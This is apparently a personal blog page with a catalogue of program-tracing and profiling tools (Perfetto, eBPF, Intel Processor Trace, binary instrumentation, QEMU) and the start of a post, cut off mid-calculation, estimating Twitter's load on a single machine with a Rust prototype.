Tristan Hume

All my favorite tracing tools: eBPF, QEMU, Perfetto, new ones I built and more

2023-12-02T00:00:00+00:00

Ever wanted more different ways to understand what’s going on in a program? Here I catalogue a huge variety of tracing methods you can use for varying types of problems. Tracing has been such a long-standing interest (and job) of mine that some of these will novel and interesting to anyone who reads this. I’ll guarantee it by including 2 novel tracing tools I’ve made and haven’t shared before (look for this: Tooling drop!).

What I see as the key parts of tracing are collecting timestamped data on what happened in a system, and then ideally visualizing it in a timeline UI instead of just as a text log. First I’ll cover my favorite ways of really easily getting trace data into a nice timeline UI, because it’s a superpower that makes all the other tracing tools more interesting. Then I’ll go over ways to get that data, everything from instrumentation to binary patching to processor hardware features.

I’ll also give a real-life example of combining eBPF tracing with Perfetto visualization to diagnose tail latency issues in huge traces by using a number of neat tricks. Look for the “eBPF Example” section.

Note: I’m hiring for my accelerator optimization team at Anthropic! See the bottom of the post for more detail.

Easily visualizing data on a trace timeline

Getting event data onto a nice zoomable timeline UI is way easier than most people think. Here’s my favorite method I do all the time which can take you from logging your data to visualizing it in minutes:

# from:
print("%d: %s %d" % (event_name, timestamp, duration))
# to:
with open('trace.json','w') as f:
  f.print("[")
  f.print('{"name": "%s", "ts": %d, "dur": %d, "cat": "hi", "ph": "X", "pid": 1, "tid": 1, "args": {}}\n' %
    (event_name, timestamp, duration))
  f.print("]") # this closing ] isn't actually required

This is the power of the Chromium Event JSON Format. It’s a super simple JSON format that supports a bunch of different kinds of events, and is supported by a lot of different profile visualizer tools.

You can view the resulting tracing files in Google’s Perfetto trace viewer by going to https://ui.perfetto.dev/, or in the older Catapult viewer (which is nicer for some traces) by going to chrome://tracing in Chrome. You can play around with the UI by going to Perfetto and clicking “Open Chrome Example” in the sidebar. Here’s a screenshot showing an event annotated with arguments and flow event arrows:

Me and my coworkers do this all the time at work, whip up trace visualizations for new data sources in under an hour and add them to our growing set of trace tools. We have a Python utility to turn a trace file into a clickable permanently-saved intranet link we can share with coworkers in Slack. This is easy to set up by building a copy of Perfetto and uploading to a file hosting server you control, and then putting trace files on that server and generating links using Perfetto’s ?url= parameter. We also write custom trace analysis scripts by loading the simple JSON into a Pandas dataframe.

I like Perfetto as its use of WebAssembly lets it scale to about 10x more events than Catapult (although it gets laggy), and you have the escape hatch of the native backend for even bigger traces. Its SQL query feature also lets you find events and annotate them in the UI using arbitrary predicates, including special SQL functions for dealing with trace stacks.

UI protip: Press ? in Perfetto to see the shortcuts. I use both WASD and CTRL+scroll to move around.

Advanced Format: Fuchsia Trace Format

The Chromium JSON format can produce gigantic files and be very slow for large traces, because it repeats both the field names and string values for every event. Perfetto also supports the Fuchsia Trace Format (FTF) which is a simple compact binary format with an incredible spec doc that makes it easy to produce binary traces. It supports interning strings to avoid repeating event names, and is designed around 64 byte words and supports clock bases so that you can directly write timestamp counters and have the UI compute the true time.

When I worked at Jane Street I used this to log instrumentation events to a buffer directly in FTF as they occurred in <10ns per span (it would have been closer to 4ns if it wasn’t for OCaml limitations).

Advanced Format: Perfetto Protobuf

Another format which is similarly compact, and also supports more features, is Perfetto’s native Protobuf trace format. It’s documented only in comments in the proto files and is a bit trickier to figure out, but might be a bit easier to generate if you have access to a protobuf library. It enables access to advanced Perfetto features like including callstack samples in a trace, which aren’t available with other formats. It’s slower to write than FTF, although Perfetto has a ProtoZero library to make it somewhat faster.

This can be really tricky to get right though and I had to reference the Perfetto source code to figure out error codes in the “info and stats” tab a lot. The biggest gotchas are you need to set trusted_packet_sequence_id on every packet, have a TrackDescriptor for every track, and set sequence_flags=SEQ_INCREMENTAl_STATE_CLEARED on the first packet.

Other tools

Some other nice trace visualization tools are Speedscope which is better for a hybrid between profile and trace visualization, pprof for pure profile call graph visualization, and Rerun for multimodal 3D visualization. Other profile viewers I like less but which have some nice parts include Trace Compass and the Firefox Profiler.

Tracing Methods

Now lets go over all sorts of different neat tracing methods! I’ll start with some obscure and interesting low level ones but I promise I’ll get to some more broadly usable ones after.

Hardware breakpoints

For ages, processors have supported hardware breakpoint registers which let you put in a small number of memory addresses and have the processor interrupt itself when any of them are accessed or executed.

perf and perftrace

Linux exposes this functionality through ptrace but also through the perf_event_open syscall and the perf record command. You can record a process like perf record -e \mem:0x1000/8:rwx my_command and view the results with perf script. It costs about 3us of overhead every time a breakpoint is hit.

Tooling drop! I wrote a tiny Python library called perftrace with a C stub which calls the perf_event_open syscall to record timestamps and register values when the breakpoints were hit.

It currently only supports execution breakpoints but you can also breakpoint on reads or writes of any memory and it would be easy to modify the code to do that. Hardware breakpoints are basically the only way to watch for accessing a specific memory address at a fine granularity which doesn’t add overhead to code which doesn’t touch that memory.

GDB scripting

In addition to using it manually, you can automate the process of following the execution of a program using debugger breakpoints by using GDB’s Python scripting interface. This is slower than perf breakpoints but gives you the ability to inspect and modify memory when you hit breakpoints. GEF is an extension to GDB that in addition to making it much nicer in general, also extends the Python API with a bunch of handy utilities.

Tooling drop! Here’s an example GDB script I wrote using GEF which gives examples of how to puppeteer, trace and inspect a program

Intel Processor Trace

Intel Processor Trace is a hardware technology on Intel chips since Skylake which allows recording a trace of every instruction the processor executes via recording enough info to reconstruct the control flow in a super-compact format, along with fine-grained timing info. It has extremely low overhead since it’s done by hardware and writes bypass the cache so the only overhead is reducing main memory bandwidth by about 1GB/s. I see no noticeable overhead at all on most program benchmarks I’ve tested.

You can access a dump of the assembly instructions executed in a recorded region using perf, lldb and gdb.

magic-trace

However assembly traces aren’t useful to most people, so when at Jane Street I created magic-trace along with my intern Chris Lambert, which generates a trace file (using FTF and Perfetto as described above) which visualizes every function call in a program execution. Jane Street generously open-sourced it so anyone can use it! Since then it’s been extended to support tracing into the kernel as well. I wrote a blog post about how it works for the Jane Street tech blog.

Processor Trace can record to a ring buffer, and magic-trace uses the hardware breakpoint feature described earlier to let you trigger capture of the last 10ms whenever some function that signals an event you want to look at happened, or when the program ends. This makes it great for a bunch of scenarios:

Debugging rare tail latency events: Add a trigger function call after something takes unusually long, and then leave magic-trace attached in production. Because it captures everything you’ll never have not logged enough data to identify the slow part.
Everyday performance analysis: A full trace timeline can be easier to interpret than a sampling profiler visualization, especially because it displays the difference between a million fast calls to a function and one slow call.
- It’s typical to find performance problems on systems that had only ever been analyzed with a sampling profiler by noticing the first time you magic-trace the program that many functions are being called more times than expected or in locations you didn’t expect.
Debugging crashes: When a program crashes for reasons you don’t understand, you can just run it under magic-trace and see every function call leading up to the crash, which is often enough to figure out why the crash happened without adding extra logging or using a debugger!

If you want to modify magic-trace to suit your needs, it’s open-source OCaml. And if you like Rust more than OCaml someone made a simple Rust port called perf2perfetto.

Unfortunately, Processor Trace isn’t supported on many virtual machines that use compatible Intel Hardware. Complain to your cloud provider to add support in their hypervisor or try bare-metal instances!

Instrumentation-based tracing profilers

What most people use to get similar benefits to magic-trace traces, especially in the gamedev industry, is low-overhead instrumentation-based profilers with custom UIs. One major advantage of instrumentation-based traces is they can contain extra information about data and not just control flow, putting arguments from your functions into the trace can be key for figuring out what’s going on. These tools often support including other data sources such as OS scheduling info, CPU samples and GPU trace data. Here’s my favorite tools like this and their pros/cons:

Tracy

Cross platform, including good Linux sampling and scheduling capture
Overhead of only 2ns/span, supports giant traces with hundreds of millions of events
Really nice and fast UI with tons of features (check out the demo videos in the readme)
Integrates CPU sampling with detailed source and assembly analysis
Popular so there are bindings in non-C++ languages like Rust and Zig.
Con: Only supports a single string/number argument to events
Con: Timeline is overly aggressive in collapsing small events into squiggles (see my post on this).

Optick

Cross-platform, lots of features, very nice UI
Supports multiple named arguments per event
Con: Not as fleshed-out for non-game applications
Con: sampling integration only works on Windows

Perfetto

Perfetto UI is nice, events can include arguments and flow event arrows
Integrates with other Perfetto data sources like OS events and sampling
Con: Higher overhead of around 600ns/span when tracing enabled
Con: UI doesn’t scale to traces as large as the above two programs

Other programs

There’s a bunch more similar small programs that generally come with their own instrumentation library and their own WebGL profile viewer. These are generally more lightweight and can be easier to integrate. For example Spall, microprofile, Remotery, Puffin (Rust-native), gpuviz. I must also mention the OCaml tracing instrumentation library I wrote for Jane Street which has overheads under 10ns/span via a compile-time macro like the C++ libraries.

eBPF

If you want to trace things using the Linux kernel there’s a new game in town, and it’s awesome. The eBPF subsystem allows you to attach complex programs to all sorts of different things in the kernel and efficiently shuttle data back to userspace, basically subsuming all the legacy facilities like ftrace and kprobes such that I won’t talk about them.

Things you can trace include: syscalls, low overhead tracepoints throughout the kernel, hardware performance counters, any kernel function call and arbitrary breakpoints or function calls/returns in userspace code. Combined these basically let you see anything on the system in or out of userspace.

You normally write BPF programs in C but there are perhaps even nicer toolkits for using Zig and Rust.

There’s a whole bunch of ways to use eBPF and I’ll talk about some of my favorites here. Some other favorites I won’t go into in detail are Wachy and retsnoop.

BCC: Easy Python API for eBPF

The BPF Compiler Collection (BCC) is a library with really nice Python bindings for compiling eBPF programs from C source code, injecting them, and getting the data back. It has a really nice feature where you can write a C struct to hold the event data you want to record, and then it will parse that and expose it so you can access the fields in Python. Check out how simple this syscall tracing example is.

I really like having the full power of Python to control my tracing scripts. BCC scripts often use Python string templating to do compile time metaprogramming of the C to compose the exact probe script you want, and then do data post-processing in Python to present things nicely.

bpftrace: terse DSL for eBPF tracing

If you want a terser way to compose tracing programs, in the style of dtrace, check out bpftrace. It lets you write one liners like these:

# Files opened by process
bpftrace -e 'tracepoint:syscalls:sys_enter_open { printf("%s %s\n", comm, str(args->filename)); }'

# Count LLC cache misses by process name and PID (uses PMCs):
bpftrace -e 'hardware:cache-misses:1000000 { @[comm, pid] = count(); }'

ply: simpler bpftrace

If you want something like bpftrace but simpler and faster with no LLVM dependencies. Check out ply.

# Which processes are receiving errors when reading from the VFS?
ply 'kretprobe:vfs_read if (retval < 0) { @[pid, comm, retval] = count(); }'

eBPF Example: Anthropic’s Perfetto-based packet and user event tracing

For work at Anthropic I wanted to analyze tail latency of some networking code so I used BCC and hooked into low-overhead kernel probe points to trace info from every single packet into a ring buffer. I could even include fields pulled from the packet header and NIC queue information, all at 1 million packets per second with no noticeable overhead.

Trick for tracing userspace events with low overhead in eBPF

I wanted to correlate packets with userspace events from a Python program, so I used a fun trick: Find a syscall which has an early-exit error path and bindings in most languages, and then trace calls to that which have specific arguments which produce an error. I traced the faccessat2 syscall such that in Python os.access(event_name, -932, dir_fd=-event_type) where event_type was an enum for start, stop and instant events would log spans to my Perfetto trace. This had an overhead of around 700ns/event, which is in a similar league to Perfetto’s full-userspace C++ instrumentation, and a lot of that is Python call overhead. The os.access function is especially good because when the syscall errors it doesn’t incur overhead by generating a Python exception like most other syscall wrappers do.

How to process events more quickly using a C helper with BCC

With 1 million packets per second I had a problem that with rare tail latency events, my traces quickly got huge and lagged Perfetto. I wanted to only keep data from shortly before one of my userspace send events took too long. Normally you’d do this with a circular buffer that gets snapshotted, and it would be possible to implement that in eBPF. But I didn’t want to implement my own ringbuf and the included ones don’t support wraparound overwriting. So instead I used the internal _open_ring_buffer function to register a ctypes C function as a ringbuffer callback instead of a Python function, and wrote an efficient C callback to filter out packets near a tail latency event before passing those to Python.

Perks of Perfetto visualization

I used the Perfetto Protobuf format with interned strings in order to keep trace size down to a few bytes per packet.

I could use Perfetto’s SQL support in the resulting trace to query for send events above a certain time threshold after startup in a specific process. Here’s a screenshot showing a long send event coinciding with packets starting to be paced out with larger gaps on one of the queues, including the ability to have line graph tracks:

I think it’s kinda crazy that we have all these different mostly-text-based BPF tools rather than a framework that lets you put all sorts of different kinds of system events into a trace UI, including easily scripting your own new events. It’s so much easier to investigate this kind of thing with a timeline UI. I started building that framework at Anthropic, but only spent a week on it since I’ve had higher priority things to do since I did the packet latency investigation.

Binary Instrumentation

When you’re instrumenting userspace programs in a way where the overhead of kernel breakpoints is too high, but you don’t have access to the source code, perhaps because you’re reverse-engineering something, then it may be time for binary instrumentation.

bpftime: eBPF-based binary instrumentation

One easy way that’s a good segue is bpftime which takes your existing eBPF programs with userspace probes, and runs them much faster by patching the instructions to run the BPF program inside the process rather than incurring 3us of kernel interrupt overhead every time.

E9Patch

For more sophisticated binary patching on x86, look to E9Patch.

On some architectures, patching can be really easy since you just patch the instruction you want to trace with a jump to a piece of “trampoline” code which has your instrumentation, and then the original instruction and a jump back.

It’s much harder on x86 since instructions are variable length, so if you just patch a jump over a target instruction, occasionally that’ll cause problems since some other instruction jumps to an instruction your longer jump had to stomp over.

People have invented all kinds of clever tricks to get around these issues including “instruction punning” where you put your patch code at addresses which are also valid x86 nop or trap instructions. E9Patch implements very advanced versions of these tricks such that the patching should basically always work.

It comes with an API as well as a tool called E9Tool which lets you patch using a command line interface:

# print all jump instructions in the xterm binary
$ e9tool -M jmp -P print xterm
jz 0x4064d5
jz 0x452c36
...

Frida

The other way to get around the difficulty of static patching, when you have to be conservative around how jumps you don’t know about could be messed up by your patches, is dynamic binary instrumentation, where you basically puppeteer the execution of the program. This is the technique used by JIT VMs like Rosetta and QEMU to basically recompile your program as you run it.

Frida exposes this incredibly powerful technique in a general way you can script in Javascript using its “Stalker” interface. Allowing you to attach JS snippets to pieces of code or rewrite the assembly as it is run. It also lets you do more standard patching, although it doesn’t work as well on x86 as E9Patch.

LD_PRELOAD

If you just want to trace a function in a dynamic library like libc, you can use LD_PRELOAD to inject a library of your own to replace any functions you like. You can use dlsym(RTLD_NEXT, "fn_name") to get the old implementation in order to wrap it. Check out this tutorial post for how.

Distributed Tracing

Distributed Tracing is where you can trace across different services via attaching special headers to requests and sending all the timing data back to a trace server. Some popular solutions are OpenTelemetry (of which there are many implementations and UIs) and Zipkin.

There’s some cool new solutions like Odigos that use eBPF to add distributed tracing support without any instrumentation.

Sampling Profilers

Sampling profilers take a sample of the full call stack of your program periodically. Typical profiler UIs don’t have the time axis I’d think of as part of “tracing”, but some UIs do. For example Speedscope accepts many profiler data formats and can visualize with a time axis, and Samply is an easy to use profiler which uses the Firefox Profiler UI, which also has a timeline view.

One neat sampling method used by py-spy and rbspy is to use the process_vm_readv syscall to read memory out of a process without interrupting it. If like an interpreter the process stores info about what it’s doing in memory, this can allow you to follow it with no overhead on the target process. You could even use this trick for low-overhead native program instrumentation: set up a little stack data structure where you push and pop pointers to span names or other context info, and then sample it from another program when needed using eBPF or process_vm_readv.

QEMU Instrumentation

When all other tracing tools fail, sometimes you have to fall back on the most powerful tool in the tracing toolbox: Full emulation and hooking into QEMU’s JIT compiler. This theoretically allows you to trace and patch both control flow and memory, in both userspace and the kernel, including snapshot and restore, across many architectures and operating systems.

However, actually doing this is not for the faint of heart and the tooling for it only barely exists.

Cannoli

Cannoli is a tracing engine for qemu-user (so no kernel stuff) which patches QEMU to log execution and memory events to a high-performance ringbuffer read by a Rust extension you compile. This lets it trace with very low overhead by spreading the load of following the trace over many cores, at the cost of not being able to modify the execution.

It’s a bit tricky to use, you have to compile QEMU and Cannoli yourself at the moment, and it’s kind of a prototype so when I’ve used it in the past for CTFs I’ve often had to add new features to it.

QEMU TCG Plugins

QEMU has recently added plugin support for its TCG JIT. Like Cannoli this is read-only for now, and its likely slower than Cannoli, but it works in qemu-system mode and exposes slightly different functionality.

usercorn

My friend has an old project called usercorn that is mostly bitrotted but has the ability to trace programs using QEMU and analyze them with Lua scripts and all sorts of fancy trace analysis. Someone (possibly him eventually) could theoretically revive it and rebase it on top of something like QEMU TCG plugins.

Conclusion: If you liked this you may like my team at Anthropic

If you made it to the bottom and enjoyed all those different tracing strategies, you may also be interested in working on my team!

I lead the performance optimization team at Anthropic (we build one of the world’s leading large language models, and have a heavy focus on figuring out how future more powerful models can go well for the world). We’ll be doing accelerator kernel optimization across GPUs, TPUs and Trainium. TPUs and Trainium are cool in that they’re simpler architectures where optimization is more like a cycle-counting puzzle, and they also have amazing tracing tools. Almost nobody knows these new architectures, so we’re currently hiring high potential people with other kinds of low-level optimization experience who are willing to learn.

I plan for us to do a bunch of optimization work as compiler-style transformation passes over IRs, but simpler via being bespoke to the ML architecture we’re optimizing. These will parallelize architectures across machines, within a machine, and within a chip in similar ways. We also work closely with an amazing ML research team to do experiments together and come up with architectures that jointly optimize for ML and hardware performance.

Anthropic recently received ~$6B in funding commitments, and are investing it heavily in compute. We currently have ~5 performance specialists, with each one making an immense contribution in helping us have models that exhibit interesting capabilities for our alignment researcher and policy teams.

AI now is still missing a lot, but progress is incredibly fast. It’s hard for me to say the coming decade of progress won’t lead to AI as good as us at nearly all jobs, which would be the biggest event in history. Anthropic is unusually full of people who joined because they really care about ensuring this goes well. I think we have the world’s best alignment, interpretability research, and AI policy teams, and I personally work on performance optimization here because I think it’s the best way to leverage my comparative advantage to help the rest of our efforts succeed at steering towards AI going well for the world in the event it keeps up this pace.

If you too would like to do fun low-level optimization on what I think will be the most important technology of this decade and want to chat: Email me at tristan@anthropic.com with a link or paragraph about the most impressive low-level or performance thing you’ve done. And feel free to check out some of my other performance writing.

Production Twitter on One Machine? 100Gbps NICs and NVMe are fast

2023-01-02T00:00:00+00:00

In this post I’ll attempt the fun stunt of designing a system that could serve the full production load of Twitter with most of the features intact on a single (very powerful) machine. I’ll start by showing off a Rust prototype of the core tweet distribution data structure handling 35x full load by fitting the hot set in RAM and parallelizing with atomics, and then do math around how modern high-performance storage and networking might let you serve a close-to-fully-featured Twitter on one machine.

I want to be clear this is meant as educational fun, and not as a good idea, at least going all the way to one machine. In the middle of the post I talk about all the alternate-universe infrastructure that would need to exist before doing this would be practical. There’s also some features which can’t fit, and a lot of ways I’m not really confident in my estimates.

I’ve now spent about a week of evenings and a 3 weekends doing research, math and prototypes, gradually figuring out how to fit more and more features (images?! ML?!!) than I initially thought I could fit. We’ll start with the very basics of Twitter and then go through gradually more and more features, in what I hope will be a fascinating tour of an alternative world of systems design where web apps are built like high performance trading systems. I’ll also analyze the minimum cost configuration using multiple more practical machines, and talk about the practical disadvantages and advantages of such a design.

Here’s an overview of the features I’ll talk about and whether I think they could fit:

Timeline and tweet distribution logic: Based on a prototype, fits easily on a handful of cores when you pack recent tweets in RAM supplemented with NVMe.
HTTP(S) request serving: Yes. HTTP fits, HTTPS fits only because of session resumption.
Image serving: A close fit with rough estimates, but maybe doable with multiple 100Gbit/s networking cards. You need effort to avoid extreme bandwidth costs.
Video, search, ads, notifications: Probably these wouldn’t fit, and it’s really tricky to estimate whether they might.
Historical tweet and image storage: Tweets fit on a specialized server, but images don’t, you could fit maybe 4 months of images with a 48x HDD storage pod.
ML-based timeline: A100 GPUs are insane and can run a decent LM against every tweet and dot-product the embeddings with every user.

Let’s get this unhinged answer to a common systems design interview question started!

Core Tweet Distribution

Let’s start with the original core of Twitter: Users posting text-based tweets to feeds which others follow with a chronological timeline. There’s basically two ways you could do this:

The timeline page pulls tweets in reverse-chronological order from each follow until enough tweets are found, using a heap to merge them. This requires retrieving a lot of tweets from different feeds, the challenge is making that fast enough.
Each tweet gets pushed into cached timelines. Pushing tweets might be faster than retrieving them in some designs, and so this might be worth the storage. But celebrity tweets have huge fanout so either need background processing or to be separately merged in, but you need a backup merge anyways in case a range of timeline isn’t cached.

The systems design interview answers I can find take the second approach because merging from the database on pageload would be too slow with typical DBs. They use some kind of background queue to do the tweet fanout writing into a sharded timeline cache like a Redis cluster.

I’m not sure how real Twitter works but I think based on Elon’s whiteboard photo and some tweets I’ve seen by Twitter (ex-)employees it seems to be mostly the first approach using fast custom caches/databases and maybe parallelization to make the merge retrievals fast enough.

How big is Twitter?

When you’re not designing your systems to scale to arbitrary levels by adding more machines, it becomes important what order of magnitude the numbers are, so let’s try to get good numbers.

So, how many tweets do we need to store? This Twitter blog post from 2013 gives figures for daily and peak rates, but those numbers are pretty old.

Through intense digging I found a researcher who left a notebook public including tweet counts from many years of Twitter’s 10% sampled “Decahose” API and discovered the surprising fact that tweet rate today is around the same as or lower than 2013! Tweet rate peaked in 2014 and then declined before reaching new peaks in the pandemic. Elon recently tweeted the same 500M/day number which matches the Decahose notebook and 2013 blog post, so this seems to be true! Twitter’s active users grew the whole time so I think this reflects a shift from a “posting about your life to your friends” platform to an algorithmic content-consumption platform.

I did all my calculations for this project using Calca (which is great although buggy, laggy and unmaintained. I might switch to Soulver) and I’ll be including all calculations as snippets from my calculation notebook.

First the public top-line numbers:

daily active users = 250e6 => 250,000,000

avg tweet rate = 500e6/day in 1/s => 5,787.037/s

The Decahose notebook (which ends March 2022) suggests that tweet rate averages out pretty well at the level of a full day, the peak days ever in the dataset (during the pandemic lockdown in 2020) only have about 535M tweets compared to 340M before the lockdown surge.

traffic surge ratio = 535e6 / 340e6 => 1.5735

max sustained tweet rate = avg tweet rate * traffic surge ratio  => 9,106.073/s

The maximum tweet record is probably still the 2013 Japanese TV airing, Elon said only 20k/second for the recent world cup.

max tweet rate = 150,000/second => 150,000/second

Now we need to figure out how much data that is. Tweets can fit a maximum of 560 bytes but probably almost all Tweets are shorter than that and we can either use a variable length encoding or a fixed size with an escape hatch to a larger structure for unusually large tweets. One dataset I tried suggested an average length close to 80 characters, but I that was maybe from before the tweet length expansion so let's use a larger number to be safe and allow a fixed size encoding with escape hatch.

tweet content max size = 560 byte

tweet content avg size = 140 byte

Tweets also have metadata like a timestamp and also some numbers we may want to cache for display such as like/retweet/view counts. Let's guess some field counts.

metadata size = 2*8 byte + 5 * 4 byte => 36 byte

Now we can use this to compute some sizes for both historical storage and a hot set using fixed-size data structures in a cache:

tweet avg size = tweet content avg size + metadata size => 176 byte

tweet storage rate = avg tweet rate * tweet avg size in GB/day => 88 GB/day

tweet storage rate * 1 year in TB => 32.1413 TB

tweet content fixed size = 284 byte

tweet cache rate = (tweet content fixed size + metadata size) * max sustained tweet rate in GB/day => 251.7647 GB/day

Let's guess the hot set that almost all requests hit is maybe 2 days of tweets. Not all tweets in people's timeline requests will be <2 days old, but also many tweets aren't seen very much so won't be in the hot set.

tweet cache size = tweet cache rate * 2 day in GB => 503.5294 GB

We also need to store the following graph for all users so we can retrieve from the cache. I need to completely guess a probably-overestimated average following count to do this.

avg following = 400

graph size = avg following * daily active users * 4 byte in GB => 400 GB

I think the main takeaway looking at these calculations is that many of these numbers are small numbers on the scale of modern computers!

Hot set in RAM, rest on NVMe

Given those numbers, I’ll be using the “your dataset fits in RAM” paradigm of systems design. However it’s a little more complicated since our dataset doesn’t actually fit in RAM.

Storing all the historical tweets takes many terabytes of storage. But probably 99% of tweets viewed are from the last few days. This means we can use a hybrid of RAM+NVMe+HDDs attached to our machine in a tiered cache:

RAM will store our hot set cache and serve almost all requests, so most of our performance will only depend on the RAM cache. It’s common to fit 512GB-1TB of RAM in a modern machine.
Modern NVMe drives can store >8TB and do over 1 million 4KB IO operations per second per drive with latencies near 100us, and you can attach dozens of them to a machine. That’s enough to serve all tweets, but we can lower CPU overhead and add headroom by just using them for long tail tweets and probably the follower graph (since it only needs one IO op per timeline request).
Some extra 20TB HDDs can store the very old very cold tweets that are basically never accessed, especially at the 2x compression I saw with zstd on tweet text from a Kaggle dataset.

However, super high performance tiering RAM+NVMe buffer managers which can access the RAM-cached pages almost as fast as a normal memory access are mostly only detailed and benchmarked in academic papers. I don’t know of any good well-maintained open-source ones, LeanStore is the closest. You don’t just need tiering logic, but also an NVMe write-ahead-log and checkpointing to ensure persistence of all changes like new tweets. This is one of the areas where running Twitter on one machine is more of a theoretical possibility than a pragmatic one.

So I just prototyped a RAM-only implementation and I’ll handwave away the difficulty of the buffer manager (and things like schema migrations) by saying it isn’t that relevant to whether the performance targets are possible because most requests just hit RAM and this paper shows that you can implement what is basically mmap with much more efficient page faults for only a 10% latency hit on non-faulting RAM reads plus some TLB misses from not being able to use hugepages. Although the real overhead is on the writes and faulting reads and from the handful of cores taken up for logging writes and managing checkpointing, cache reads and evictions.

My Prototype

I made a prototype (source on Github) in Rust to benchmark the in-memory performance of timeline merging and show that I could get it fast enough to serve the full load. At it’s core is a minimalist pooling-and-indices style representation of Twitter’s data, optimized to be fairly memory-efficient:

/// Leave room for a full 280 English character plus slop for accents or emoji.
/// A real implementation would have an escape hatch for longer tweets.
pub const TWEET_BYTES: usize = 286;

// non-zero so options including a timestamp don't take any more space
// u32 since that's 100+ years of second-level precision and it lets us pack atomics
pub type Timestamp = NonZeroU32;
pub type TweetIdx = u32;

pub struct Tweet {
    pub content: [u8; TWEET_BYTES],
    pub ts: Timestamp,
    pub likes: u32, pub quotes: u32, pub retweets: u32,
}

/// linked list of tweets to make appending fast and avoid space overhead
/// a linked list of chunks of tweets would probably be faster because of
/// cache locality of fetches, but I haven't implemented that
pub struct NextLink {
    pub ts: Timestamp, // so we know whether to follow further
    pub tweet_idx: TweetIdx,
}

/// Top level feeds use an atomic link so we can mutate concurrently
/// This effectively works by casting NextLink to a u64
pub struct AtomicChain(AtomicU64);

/// Since this is most of our RAM and cache misses we make sure it's
/// aligned to cache lines for style points
#[repr(align(64))]
pub struct ChainedTweet {
    pub tweet: Tweet,
    pub prev_tweet: Option<NextLink>,
}
assert_eq_size!([u8; 320], ChainedTweet); // 5 cache lines

/// We store the Graph in a format we can mmap from a pre-baked file
/// so that our tests can load a real graph faster
pub struct Graph<'a> {
    pub users: &'a [User],
    pub follows: &'a [UserIdx],
}

pub struct User {
    pub follows_idx: usize, // index into graph follows
    pub num_follows: u32,
    pub num_followers: u32,
}

impl<'a> Graph<'a> {
    // We can use zero-cost abstractions to make our pools more ergonomic
    pub fn user_follows(&'a self, user: &User) -> &'a [UserIdx] {
        &self.follows[user.follows_idx..][..user.num_follows as usize]
    }
}

pub struct Datastore<'a> {
    pub graph: Graph<'a>,
    // This is a tiny custom pool which mmaps a vast amount of un-paged virtual
    // address space. It's like a Vec which never moves and lets you append concurrently
    // with only an immutable reference by using an internal append lock.
    pub tweets: SharedPool<ChainedTweet>,
    pub feeds: Vec<AtomicChain>,
}

Then the code to compose a timeline is a simple usage of Rust’s built-in heap:

/// Re-use these allocations so fetching can be malloc-free
pub struct TimelineFetcher {
    tweets: Vec<Tweet>,
    heap: BinaryHeap<NextLink>,
}

impl TimelineFetcher {
    fn push_after(&mut self, link: Option<NextLink>, after: Timestamp) {
        link.filter(|l| l.ts >= after).map(|l| self.heap.push(l));
    }

    pub fn for_user<'a>(&'a mut self, data: &Datastore,
      user_idx: UserIdx, max_len: usize, after: Timestamp
    ) -> Timeline<'a> {
        self.heap.clear(); self.tweets.clear();
        let user = &data.graph.users[user_idx as usize];
        // seed heap with links for all follows
        for follow in data.graph.user_follows(user) {
            self.push_after(data.feeds[*follow as usize].fetch(), after);
        }
        // compose timeline by popping chronologically next tweet
        while let Some(NextLink { ts: _, tweet_idx }) = self.heap.pop() {
            let chain = &data.tweets[tweet_idx as usize];
            self.tweets.push(chain.tweet.clone());
            if self.tweets.len() >= max_len { break }
            self.push_after(chain.prev_tweet, after);
        }
        Timeline {tweets: &self.tweets[..]}
    }
}

I wrote a bunch of support code to load an old Twitter follower graph dump from 2010, which is about 7GB in-memory. I used a dump so that I could capture a realistic distribution shape of follower counts and overlaps, while fitting on my laptop. I then wrote a load-generator which selects every user with more than 20 followers (around 7M) to tweet and every user with more than 20 follows (around 9M) to view. I then generate 30 million fresh tweets and then benchmark how long it takes to compose timelines with them on all 8 cores of my laptop and get the following results:

Initially added 15000000 tweets in 5.46230697s: 2746092.463 tweets/s.
Benchmarked adding 15000000 tweets in 5.456315988s: 2749107.646 tweets/s.
Starting fetches from 8 threads
Done 16714668 in 5.054423792s at 3306938.375 tweets/s. Avg timeline size 167.15 -> expansion 100.63
Done 16723580 in 5.072738523s at 3296755.771 tweets/s. Avg timeline size 167.24 -> expansion 100.69
Done 16724418 in 5.077739414s at 3293673.944 tweets/s. Avg timeline size 167.24 -> expansion 100.69
Done 16752863 in 5.079175123s at 3298343.253 tweets/s. Avg timeline size 167.53 -> expansion 100.86
Done 16715614 in 5.081238053s at 3289673.467 tweets/s. Avg timeline size 167.16 -> expansion 100.64
Done 16741876 in 5.083800824s at 3293180.945 tweets/s. Avg timeline size 167.42 -> expansion 100.80
Done 16729038 in 5.090990804s at 3286008.293 tweets/s. Avg timeline size 167.29 -> expansion 100.72
Done 16748782 in 5.096817055s at 3286125.796 tweets/s. Avg timeline size 167.49 -> expansion 100.84

So about 3.3M tweets distributed per core-second, when retrieved with an average timeline chunk of 167. And because it’s mostly cache misses, per-core performance only goes down to 2.5M/sec when using all 16 hyperthreads, allowing me to reach 40M tweets fetched per second on my laptop. Now I’m fully aware my benchmark is not the full data size of Twitter nor the most realistic load I could create, but I’m just trying to get an estimate of what the full scale performance would look like and I think this gives a reasonable estimate. My test data is way larger than my laptop cache and fully random so basically every load should be a cache miss, and profiling seems to align with this. So while I think memory access is marginally slower when you have more of it, the throughput should be similar on a server that had enough RAM on one NUMA node to fit the full-sized tweet cache. More realistically non-uniform load distributions I believe would just make it more likely that the L3 cache actually made things faster.

It also looks like adding tweets to the data structure shouldn’t be a bottleneck, given it adds tweets at over 1M/core-sec when the highest peak Twitter had was 150k/sec.

Can the prototype meet the real load? Very yes!

My prototype’s performance should mainly scale based on number of tweets retrieved (because of cache misses retrieving them) and the size of retrieved chunks (larger chunks dilute the overhead of setting up the follow chain heap). The fixed overhead also scales with average follow count and variable with log follow count, which has probably grown since 2010 but I unfortunately don’t have numbers on, and most of the time is spent in the variable segment anyhow. So let’s see how those numbers stack up to calculations of real Twitter load!

Elon tweeted 100 billion impressions per day which probably includes a lot of scrolling past algorithmic tweets/likes that aren't part of the basic core version of Twitter, but corresponds to an average timeline delivery rate that's 2-3x the number of tweets on an average day from all the people I follow.

avg timeline rate = 400/day

delivery rate = daily active users * avg timeline rate => 100,000,000,000/day

delivery rate in 1/s => 1,157,407.4074/s

avg expansion = delivery rate / avg tweet rate in 1 => 200

delivery bandwidth = tweet avg size * delivery rate in Gbit/s => 1.6296 Gbit/s

delivery bandwidth in TB/month => 535.689 TB/month

